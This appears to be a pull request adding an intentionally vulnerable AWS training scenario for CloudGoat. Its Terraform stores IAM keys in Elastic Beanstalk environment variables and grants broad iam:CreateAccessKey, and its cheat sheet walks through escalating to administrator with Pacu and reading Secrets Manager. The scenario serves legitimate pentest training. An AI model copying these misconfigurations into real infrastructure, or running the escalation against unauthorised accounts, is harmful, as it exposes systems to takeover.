### PR TITLE
New Scenario: Beanstalk Secrets

### DIFF
--- a/scenarios/beanstalk_secrets/README.md
+++ b/scenarios/beanstalk_secrets/README.md
@@ -1,0 +1,48 @@
+# Scenario: [SCENARIO_NAME]
+
+**Size:** Small/Medium/Large
+
+**Difficulty:** Easy/Moderate/Hard
+
+**Command:** `./cloudgoat.py create [SCENARIO_NAME]`
+
+## Scenario Resources
+
+- 1 [RESOURCE_TYPE]
+- 1 [RESOURCE_TYPE]
+- 1 [RESOURCE_TYPE]
+- 1 [RESOURCE_TYPE]
+- 1 [RESOURCE_TYPE]
+
+## Scenario Start(s)
+
+1. AWS Access Key and Secret Key
+
+## Scenario Goal(s)
+
+[SCENARIO_GOAL]
+
+## Summary
+
+In this scenario, you are given AWS credentials. Your task is to...
+
+## Exploitation Route
+
+A flowchart illustrating the routes the attacker may take when completing the scenario. Lucidchart is recommended.
+
+![Scenario Route(s)](https://rhinosecuritylabs.com/wp-content/uploads/2018/07/cloudgoat-e1533043938802-1140x400.jpg)
+
+## Walkthrough - [SERVICE] Secrets
+
+Include a high level overview of the attack path here. 
+
+1. Start by...
+2. ...
+3. ...
+4. ...
+5. ...
+6. ...
+7. ...
+8. ...
+
+A detailed cheat sheet & walkthrough for this route is available [here](./cheat_sheet.md). 

--- a/scenarios/beanstalk_secrets/README.md
+++ b/scenarios/beanstalk_secrets/README.md
@@ -30,6 +30,8 @@ In this scenario, you are provided with low-privileged AWS credentials that gran
 
 A flowchart illustrating the routes the attacker may take when completing the scenario. Lucidchart is recommended.
 
+(I still need to do this) 
+
 ![Scenario Route(s)](https://rhinosecuritylabs.com/wp-content/uploads/2018/07/cloudgoat-e1533043938802-1140x400.jpg)
 
 ## Walkthrough - Elastic Beanstalk Secrets

--- a/scenarios/beanstalk_secrets/README.md
+++ b/scenarios/beanstalk_secrets/README.md
@@ -28,11 +28,10 @@ In this scenario, you are provided with low-privileged AWS credentials that gran
 
 ## Exploitation Route
 
-A flowchart illustrating the routes the attacker may take when completing the scenario. Lucidchart is recommended.
 
-(I still need to do this) 
+![Flowcharts](https://github.com/user-attachments/assets/cf16f767-d8b3-436f-9812-c2d06ea0876b)
 
-![Scenario Route(s)](https://rhinosecuritylabs.com/wp-content/uploads/2018/07/cloudgoat-e1533043938802-1140x400.jpg)
+
 
 ## Walkthrough - Elastic Beanstalk Secrets
 

--- a/scenarios/beanstalk_secrets/README.md
+++ b/scenarios/beanstalk_secrets/README.md
@@ -1,30 +1,30 @@
-# Scenario: [SCENARIO_NAME]
+# Scenario: beanstalk_secrets
 
-**Size:** Small/Medium/Large
+**Size:** Medium
 
-**Difficulty:** Easy/Moderate/Hard
+**Difficulty:** Moderate
 
-**Command:** `./cloudgoat.py create [SCENARIO_NAME]`
+**Command:** `./cloudgoat.py create beanstalk_secrets`
 
 ## Scenario Resources
 
-- 1 [RESOURCE_TYPE]
-- 1 [RESOURCE_TYPE]
-- 1 [RESOURCE_TYPE]
-- 1 [RESOURCE_TYPE]
-- 1 [RESOURCE_TYPE]
+- 1 VPC
+- 1 Elastic Beanstalk Environment
+- 1 IAM Low-Privilege User
+- 1 IAM Secondary User
+- 1 AWS Secrets Manager Secret
 
 ## Scenario Start(s)
 
-1. AWS Access Key and Secret Key
+1. AWS Access Key and Secret Key for the low-privileged user.
 
 ## Scenario Goal(s)
 
-[SCENARIO_GOAL]
+Retrieve the final flag from AWS Secrets Manager by escalating privileges from a low-privileged user to an administrator account.
 
 ## Summary
 
-In this scenario, you are given AWS credentials. Your task is to...
+In this scenario, you are provided with low-privileged AWS credentials that grant limited access to Elastic Beanstalk. Your task is to enumerate the Elastic Beanstalk environment and discover misconfigured environment variables containing secondary credentials. Using these secondary credentials, you can enumerate IAM permissions to eventually create an access key for an administrator user. With these admin privileges, you retrieve the final flag stored in AWS Secrets Manager.
 
 ## Exploitation Route
 
@@ -32,17 +32,15 @@ A flowchart illustrating the routes the attacker may take when completing the sc
 
 ![Scenario Route(s)](https://rhinosecuritylabs.com/wp-content/uploads/2018/07/cloudgoat-e1533043938802-1140x400.jpg)
 
-## Walkthrough - [SERVICE] Secrets
+## Walkthrough - Elastic Beanstalk Secrets
 
-Include a high level overview of the attack path here. 
+1. Start by using the provided low-privileged AWS credentials.
+2. Verify access with `aws sts get-caller-identity`.
+3. Enumerate Elastic Beanstalk applications and environments using Pacu’s `beanstalk__enum` module.
+4. Identify the EB environment with misconfigured environment variables that store secondary credentials.
+5. Use the secondary credentials to enumerate IAM resources and permissions.
+6. Discover that you can create an access key for an administrator user using the `iam:CreateAccessKey` permission.
+7. Generate an admin access key and take over the account.
+8. Finally, use the admin privileges to retrieve the final flag from AWS Secrets Manager.
 
-1. Start by...
-2. ...
-3. ...
-4. ...
-5. ...
-6. ...
-7. ...
-8. ...
-
-A detailed cheat sheet & walkthrough for this route is available [here](./cheat_sheet.md). 
+A detailed cheat sheet & walkthrough for this route is available [here](./cheat_sheet.md).

--- a/scenarios/beanstalk_secrets/cheat_sheet.md
+++ b/scenarios/beanstalk_secrets/cheat_sheet.md
@@ -1,0 +1,9 @@
+# [SCENARIO NAME] Walkthrough
+
+## Summary
+
+In this scenario, you are provided with.... You need to enumerate... Then, use the ... Finally, do this to get the final flag. 
+
+## Detailed Walkthrough
+
+The purpose of CloudGoat is to help people learn AWS Pentesting. Provide a detailed walkthrough for the scenario with this goal in mind. A good example to refer to is the walkthrough for the [SNS Secrets scenario](https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/sns_secrets/cheat_sheet.md)

--- a/scenarios/beanstalk_secrets/cheat_sheet.md
+++ b/scenarios/beanstalk_secrets/cheat_sheet.md
@@ -1,9 +1,121 @@
-# [SCENARIO NAME] Walkthrough
+# Beanstalk Secrets Walkthrough
 
 ## Summary
 
-In this scenario, you are provided with.... You need to enumerate... Then, use the ... Finally, do this to get the final flag. 
+In this scenario, you are provided with low-privileged AWS credentials. Your task is to enumerate Elastic Beanstalk applications and environments, discover misconfigured environment variables that leak secondary credentials, and then use these credentials to enumerate IAM permissions. By exploiting the ability to create an access key for an administrator user, you will escalate your privileges and ultimately retrieve the final flag stored in AWS Secrets Manager.
 
 ## Detailed Walkthrough
 
-The purpose of CloudGoat is to help people learn AWS Pentesting. Provide a detailed walkthrough for the scenario with this goal in mind. A good example to refer to is the walkthrough for the [SNS Secrets scenario](https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/sns_secrets/cheat_sheet.md)
+### Configuring the AWS Keys
+
+After launching the scenario, you will be provided with an AWS Access Key ID and Secret Access Key for the low-privileged user. Configure your AWS CLI profile with these credentials:
+
+```bash
+aws configure --profile beanstalk
+```
+
+You will be prompted for the Access Key, Secret Key, Region, and output format. For example:
+
+```bash
+AWS Access Key ID: AKIA2HV********
+AWS Secret Access Key: v+xInRa11dSj**************
+Default region name: us-east-1
+Default output format: json
+```
+
+Verify your access:
+
+```bash
+aws sts get-caller-identity --profile beanstalk
+```
+
+### Enumerating Elastic Beanstalk
+
+Use Pacu to enumerate Elastic Beanstalk applications and environments:
+
+```bash
+Pacu (beanstalk:imported-beanstalk) > run beanstalk__enum --region us-east-1
+```
+
+The module will list available applications and environments. Notice the misconfigured environment where environment variables reveal secondary credentials.
+
+### Checking Permissions with Pacu
+
+Next, assess the permissions of the low-privileged user by enumerating available IAM actions:
+
+```bash
+Pacu (beanstalk:imported-beanstalk) > run iam__bruteforce_permissions --region us-east-1
+```
+
+Review the output to understand the limited permissions available on Elastic Beanstalk and IAM.
+
+### Switching to the Secondary User
+
+The Elastic Beanstalk environment stores secondary credentials in its environment variables. Use these credentials to configure a new AWS CLI profile:
+
+```bash
+aws configure --profile beanstalk2
+```
+
+Verify the secondary user’s access:
+
+```bash
+aws sts get-caller-identity --profile beanstalk2
+```
+
+### Enumerating IAM with the Secondary User
+
+With the secondary credentials, enumerate IAM permissions:
+
+```bash
+Pacu (beanstalk2:imported-beanstalk2) > run iam__enum_permissions --region us-east-1
+```
+
+This will display additional IAM permissions, including the ability to create an access key for other users.
+
+### Privilege Escalation with CreateAccessKey
+
+Run the privilege escalation scan in Pacu to identify exploitable methods:
+
+```bash
+Pacu (beanstalk2:imported-beanstalk2) > run iam__privesc_scan --scan-only
+```
+
+Notice that the `CreateAccessKey` method is confirmed as a viable escalation vector. Now execute the method to target the administrator user:
+
+```bash
+Pacu (beanstalk2:imported-beanstalk2) > run iam__privesc_scan --user-methods CreateAccessKey
+```
+
+Follow the prompts to select the admin user. Pacu will then generate a new access key for the admin user and display the credentials.
+
+### Configuring the Admin Profile
+
+Using the new admin credentials, set up an AWS CLI profile:
+
+```bash
+aws configure --profile admin
+```
+
+Enter the provided admin Access Key ID and Secret Access Key. Confirm access:
+
+```bash
+aws sts get-caller-identity --profile admin
+```
+
+### Retrieving the Final Flag
+
+Finally, with admin privileges, run the secrets enumeration module to retrieve the final flag:
+
+```bash
+Pacu (beanstalk3:imported-admin) > run secrets__enum --region us-east-1
+```
+
+Check the downloaded secrets in the Pacu output directory (typically under `~/.local/share/pacu/<session>/downloads/secrets/`). For example:
+
+```bash
+cat ~/.local/share/pacu/beanstalk3/downloads/secrets/secrets_manager/secrets.txt
+```
+
+The file should contain the final flag, for example:  
+`FLAG{*********************}`

--- a/scenarios/beanstalk_secrets/cheat_sheet.md
+++ b/scenarios/beanstalk_secrets/cheat_sheet.md
@@ -68,7 +68,7 @@ aws sts get-caller-identity --profile beanstalk2
 With the secondary credentials, enumerate IAM permissions:
 
 ```bash
-Pacu (beanstalk2:imported-beanstalk2) > run iam__enum_permissions --region us-east-1
+Pacu (beanstalk2:imported-beanstalk2) > run iam__enum_permissions
 ```
 
 This will display additional IAM permissions, including the ability to create an access key for other users.

--- a/scenarios/beanstalk_secrets/manifest.yml
+++ b/scenarios/beanstalk_secrets/manifest.yml
@@ -1,0 +1,13 @@
+---
+  # The name of the scenario, alpha-numeric characters only, and underscore-separated
+- name: {{ scenario_name }}
+  # The name of the author(s), comma separated
+- author: {{ author_name }}
+  # The version of the scenario, where major versions are breaking changes and minor are small fixes.
+- version: {{ scenario_version }}
+  # Text displayed to the user when they type "{{ scenario_name }} help"
+- help: |
+        {{ scenario_help }}
+# Records the date upon which this scenario was last updated, in MM-DD-YYYY format
+- last-updated: {{ date_last_updated }}
+...

--- a/scenarios/beanstalk_secrets/manifest.yml
+++ b/scenarios/beanstalk_secrets/manifest.yml
@@ -1,13 +1,13 @@
 ---
   # The name of the scenario, alpha-numeric characters only, and underscore-separated
-- name: {{ scenario_name }}
+- name: beanstalk_secrets
   # The name of the author(s), comma separated
-- author: {{ author_name }}
+- author: Tyler Ramsbey
   # The version of the scenario, where major versions are breaking changes and minor are small fixes.
-- version: {{ scenario_version }}
+- version: 1.0
   # Text displayed to the user when they type "{{ scenario_name }} help"
 - help: |
-        {{ scenario_help }}
+        In this scenario, you are provided with low-privileged AWS credentials that grant limited access to Elastic Beanstalk. Your task is to enumerate the Elastic Beanstalk environment and discover misconfigured environment variables containing secondary credentials. Using these secondary credentials, you can enumerate IAM permissions to eventually create an access key for an administrator user. With these admin privileges, you retrieve the final flag stored in AWS Secrets Manager.
 # Records the date upon which this scenario was last updated, in MM-DD-YYYY format
 - last-updated: {{ date_last_updated }}
 ...

--- a/scenarios/beanstalk_secrets/terraform/ec2.tf
+++ b/scenarios/beanstalk_secrets/terraform/ec2.tf
@@ -1,0 +1,36 @@
+#############################
+# Elastic Beanstalk Application
+#############################
+
+resource "aws_elastic_beanstalk_application" "eb_app" {
+  name        = "${var.cgid}-app"
+  description = "Elastic Beanstalk application for insecure secrets scenario"
+}
+
+#############################
+# Elastic Beanstalk Environment
+#############################
+
+resource "aws_elastic_beanstalk_environment" "eb_env" {
+  name                = replace("${var.cgid}-env", "_", "-")
+  application         = aws_elastic_beanstalk_application.eb_app.name
+  solution_stack_name = "64bit Amazon Linux 2 v3.7.9 running Python 3.8"
+
+  setting {
+    namespace = "aws:elasticbeanstalk:application:environment"
+    name      = "SECONDARY_ACCESS_KEY"
+    value     = aws_iam_access_key.secondary_key.id
+  }
+
+  setting {
+    namespace = "aws:elasticbeanstalk:application:environment"
+    name      = "SECONDARY_SECRET_KEY"
+    value     = aws_iam_access_key.secondary_key.secret
+  }
+
+  setting {
+    namespace = "aws:autoscaling:launchconfiguration"
+    name      = "IamInstanceProfile"
+    value     = aws_iam_instance_profile.eb_instance_profile.name
+  }
+}

--- a/scenarios/beanstalk_secrets/terraform/ec2.tf
+++ b/scenarios/beanstalk_secrets/terraform/ec2.tf
@@ -33,4 +33,16 @@ resource "aws_elastic_beanstalk_environment" "eb_env" {
     name      = "IamInstanceProfile"
     value     = aws_iam_instance_profile.eb_instance_profile.name
   }
-}
+  # Launch this in the CG VPC 
+  setting {
+    namespace = "aws:ec2:vpc"
+    name      = "VPCId"
+    value     = aws_vpc.vpc.id
+  }
+
+  setting {
+    namespace = "aws:ec2:vpc"
+    name      = "Subnets"
+    value     = aws_subnet.subnet.id
+  }
+} 

--- a/scenarios/beanstalk_secrets/terraform/iam.tf
+++ b/scenarios/beanstalk_secrets/terraform/iam.tf
@@ -4,6 +4,7 @@
 
 resource "aws_iam_user" "admin_user" {
   name = "${var.cgid}_admin_user"
+  force_destroy = true
 }
 
 resource "aws_iam_policy" "admin_user_policy" {

--- a/scenarios/beanstalk_secrets/terraform/iam.tf
+++ b/scenarios/beanstalk_secrets/terraform/iam.tf
@@ -53,7 +53,8 @@ resource "aws_iam_policy" "low_priv_policy" {
           "elasticbeanstalk:DescribeEnvironments",
           "elasticbeanstalk:DescribeEvents",
           "elasticbeanstalk:ListAvailableSolutionStacks",
-          "elasticbeanstalk:ListTagsForResource"
+          "elasticbeanstalk:ListTagsForResource",
+          "ec2:DescribeSubnets"
         ],
         Resource: "*"
       },

--- a/scenarios/beanstalk_secrets/terraform/iam.tf
+++ b/scenarios/beanstalk_secrets/terraform/iam.tf
@@ -1,0 +1,172 @@
+#############################
+# Administrator Privilege User
+#############################
+
+resource "aws_iam_user" "admin_user" {
+  name = "${var.cgid}_admin_user"
+}
+
+resource "aws_iam_policy" "admin_user_policy" {
+  name = "${var.cgid}_admin_user_policy"
+  policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Action   = "*",
+        Effect   = "Allow",
+        Resource = "*"
+      }
+    ]
+  })
+}
+
+resource "aws_iam_user_policy_attachment" "admin_user_policy_attach" {
+  user       = aws_iam_user.admin_user.name
+  policy_arn = aws_iam_policy.admin_user_policy.arn
+}
+
+#############################
+# Low-Privileged User (Initial Credentials)
+#############################
+
+resource "aws_iam_user" "low_priv_user" {
+  name = "${var.cgid}_low_priv_user"
+}
+
+resource "aws_iam_access_key" "low_priv_key" {
+  user = aws_iam_user.low_priv_user.name
+}
+
+resource "aws_iam_policy" "low_priv_policy" {
+  name = "${var.cgid}_low_priv_policy"
+  policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Effect: "Allow",
+        Action: [
+          "elasticbeanstalk:DescribeApplications",
+          "elasticbeanstalk:DescribeApplicationVersions",
+          "elasticbeanstalk:DescribeConfigurationSettings",
+          "elasticbeanstalk:DescribeEnvironmentHealth",
+          "elasticbeanstalk:DescribeEnvironmentResources",
+          "elasticbeanstalk:DescribeEnvironments",
+          "elasticbeanstalk:DescribeEvents",
+          "elasticbeanstalk:ListAvailableSolutionStacks",
+          "elasticbeanstalk:ListTagsForResource"
+        ],
+        Resource: "*"
+      },
+      {
+        Effect: "Allow",
+        Action: [
+          "s3:*"
+        ],
+        Resource: [
+          "arn:aws:s3:::elasticbeanstalk*", 
+          "arn:aws:s3:::elasticbeanstalk*/*"
+        ] 
+      }
+    ]
+  })
+}
+
+resource "aws_iam_user_policy_attachment" "low_priv_policy_attach" {
+  user       = aws_iam_user.low_priv_user.name
+  policy_arn = aws_iam_policy.low_priv_policy.arn
+}
+
+#############################
+# Secondary Credentials (Discovered in EB Config)
+#############################
+
+resource "aws_iam_user" "secondary_user" {
+  name = "${var.cgid}_secondary_user"
+}
+
+resource "aws_iam_access_key" "secondary_key" {
+  user = aws_iam_user.secondary_user.name
+}
+
+resource "aws_iam_policy" "secondary_policy" {
+  name = "${var.cgid}_secondary_policy"
+  policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Effect   = "Allow",
+        Action   = [
+          "iam:CreateAccessKey"
+        ],
+        Resource = "*"
+      },
+      {
+        Effect = "Allow",
+        Action = [
+          "iam:ListRoles",
+          "iam:GetRole",
+          "iam:ListPolicies",
+          "iam:GetPolicy",
+          "iam:ListPolicyVersions",
+          "iam:GetPolicyVersion",
+          "iam:ListUsers",
+          "iam:GetUser",
+          "iam:ListGroups",
+          "iam:GetGroup",
+          "iam:ListAttachedUserPolicies",
+          "iam:ListAttachedRolePolicies",
+          "iam:GetRolePolicy"
+        ],
+        Resource = "*"
+      }
+    ]
+  })
+}
+
+resource "aws_iam_user_policy_attachment" "secondary_policy_attach" {
+  user       = aws_iam_user.secondary_user.name
+  policy_arn = aws_iam_policy.secondary_policy.arn
+}
+
+#############################
+# Elastic Beanstalk IAM Roles and Instance Profile
+#############################
+
+# Role for EB EC2 Instances
+resource "aws_iam_role" "eb_instance_role" {
+  name = "${var.cgid}_eb_instance_role"
+  assume_role_policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Action = "sts:AssumeRole",
+        Effect = "Allow",
+        Principal = {
+          Service = "ec2.amazonaws.com"
+        }
+      }
+    ]
+  })
+}
+
+resource "aws_iam_instance_profile" "eb_instance_profile" {
+  name = "${var.cgid}_eb_instance_profile"
+  role = aws_iam_role.eb_instance_role.name
+}
+
+# Role for the Elastic Beanstalk service
+resource "aws_iam_role" "eb_service_role" {
+  name = "${var.cgid}_eb_service_role"
+  assume_role_policy = jsonencode({
+    Version = "2012-10-17",
+    Statement = [
+      {
+        Action = "sts:AssumeRole",
+        Effect = "Allow",
+        Principal = {
+          Service = "elasticbeanstalk.amazonaws.com"
+        }
+      }
+    ]
+  })
+}

--- a/scenarios/beanstalk_secrets/terraform/output.tf
+++ b/scenarios/beanstalk_secrets/terraform/output.tf
@@ -1,0 +1,8 @@
+output "initial_low_priv_credentials" {
+  description = "Initial low-privileged credentials provided to the scenario"
+  value = <<EOF
+Access Key: ${aws_iam_access_key.low_priv_key.id}
+Secret Key: ${aws_iam_access_key.low_priv_key.secret}
+EOF
+  sensitive = true
+}

--- a/scenarios/beanstalk_secrets/terraform/provider.tf
+++ b/scenarios/beanstalk_secrets/terraform/provider.tf
@@ -1,0 +1,26 @@
+## This is used for the CloudGoat scenario to pull the AWS profile from the CloudGoat configuration.
+## Configure required Terraform and provider versions.
+
+terraform {
+  required_version = ">= 1.5"
+
+  required_providers {
+    aws = {
+      source  = "hashicorp/aws"
+      version = ">= 5.74.0"
+    }
+  }
+}
+
+provider "aws" {
+  profile = var.profile
+  region  = var.region
+
+  # This configures default tags for all resources
+  default_tags {
+    tags = {
+      Stack    = var.stack-name
+      Scenario = var.scenario-name
+    }
+  }
+}

--- a/scenarios/beanstalk_secrets/terraform/secrets.tf
+++ b/scenarios/beanstalk_secrets/terraform/secrets.tf
@@ -1,0 +1,8 @@
+resource "aws_secretsmanager_secret" "final_flag" {
+  name = "${var.cgid}_final_flag"
+}
+
+resource "aws_secretsmanager_secret_version" "final_flag" {
+  secret_id     = aws_secretsmanager_secret.final_flag.id
+  secret_string = var.final_flag
+}

--- a/scenarios/beanstalk_secrets/terraform/variables.tf
+++ b/scenarios/beanstalk_secrets/terraform/variables.tf
@@ -1,0 +1,52 @@
+variable "profile" {
+  description = "The AWS profile to use"
+  type        = string
+}
+
+variable "cgid" {
+  description = "CGID variable for unique naming"
+  type        = string
+}
+
+variable "cg_whitelist" {
+  description = "User's public IP address(es)"
+  type        = list(string)
+}
+
+variable "region" {
+  description = "The AWS region to deploy to"
+  default     = "us-east-1"
+  type        = string
+}
+
+variable "stack-name" {
+  description = "Name of the CloudGoat stack"
+  default     = "CloudGoat"
+  type        = string
+}
+
+variable "scenario-name" {
+  description = "Name of the scenario"
+  default     = "beanstalk_secrets"
+  type        = string
+}
+
+# Additional scenario-specific variables
+
+variable "ami_id" {
+  description = "AMI ID for the EC2 instance (Amazon Linux 2 recommended)"
+  type        = string
+  default     = "ami-0c94855ba95c71c99"
+}
+
+variable "instance_type" {
+  description = "EC2 instance type for the simulated Elastic Beanstalk environment"
+  type        = string
+  default     = "t2.micro"
+}
+
+variable "final_flag" {
+  description = "The final flag stored in Secrets Manager"
+  type        = string
+  default     = "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}"
+}

--- a/scenarios/beanstalk_secrets/terraform/vpc.tf
+++ b/scenarios/beanstalk_secrets/terraform/vpc.tf
@@ -1,0 +1,42 @@
+resource "aws_vpc" "vpc" {
+  cidr_block = "10.0.0.0/16"
+  tags = {
+    Name = "cg-vpc-${var.cgid}"
+  }
+}
+
+resource "aws_internet_gateway" "igw" {
+  vpc_id = aws_vpc.vpc.id
+  tags = {
+    Name = "cg-igw-${var.cgid}"
+  }
+}
+
+resource "aws_subnet" "subnet" {
+  vpc_id                  = aws_vpc.vpc.id
+  cidr_block              = "10.0.1.0/24"
+  availability_zone       = "us-east-1a"
+  map_public_ip_on_launch = true
+
+  tags = {
+    Name = "cg-subnet-${var.cgid}"
+  }
+}
+
+resource "aws_route_table" "route_table" {
+  vpc_id = aws_vpc.vpc.id
+  tags = {
+    Name = "cg-route-table-${var.cgid}"
+  }
+}
+
+resource "aws_route" "route" {
+  route_table_id         = aws_route_table.route_table.id
+  destination_cidr_block = "0.0.0.0/0"
+  gateway_id             = aws_internet_gateway.igw.id
+}
+
+resource "aws_route_table_association" "route_table_association" {
+  subnet_id      = aws_subnet.subnet.id
+  route_table_id = aws_route_table.route_table.id
+}


### PR DESCRIPTION
# Pull Request: Add beanstalk_secrets Scenario to CloudGoat

**Description:**

This PR adds a new CloudGoat scenario called **beanstalk_secrets**. The scenario simulates a real-world AWS misconfiguration in Elastic Beanstalk that I have seen while pentesting. 

**New Pacu Module:**

This scenario is designed to showcase a new Pacu module for Elastic Beanstalk Enumeration. This module is currently pending review and has been submitted as a Pull Request at [https://github.com/RhinoSecurityLabs/pacu/pull/469](https://github.com/RhinoSecurityLabs/pacu/pull/469).

**Additional Notes:**

- Users must manually delete the additional access keys created for the admin user to clean up the environment.

